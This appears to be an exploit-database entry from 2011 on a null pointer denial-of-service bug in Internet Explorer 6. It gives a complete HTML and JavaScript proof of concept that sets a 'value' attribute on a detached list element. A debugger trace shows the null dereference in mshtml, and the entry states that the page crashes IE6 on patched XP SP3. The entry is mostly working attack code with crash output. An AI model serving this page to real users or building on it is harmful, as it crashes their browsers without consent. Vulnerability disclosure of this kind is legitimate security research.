Internet Explorer 6 Null Pointer Access DoS Vulnerability



EKU-ID: 536 CVE: OSVDB-ID:
Author: 灰帽 Published: 2011-06-15 Verified: Verified


<html>
<body >
<script>

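// Create an <li> element that is never attached to a list or to the document
com = document.createElement('li');

// Set the "value" attribute on the detached element
com.setAttribute('value', 'huimaozi');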
 
</script>
</body>
</html>

mshtml!CMarkup::FindMyListContainer:
7e41ea7f 8bff            mov     edi,edi
7e41ea81 55              push    ebp
7e41ea82 8bec            mov     ebp,esp
7e41ea84 56              push    esi
7e41ea85 8b7508          mov     esi,dword ptr [ebp+8]
7e41ea88 8b0e            mov     ecx,dword ptr [esi]  ds:0023:00000000=????????

The code above crashes IE6 on fully patched XP SP3.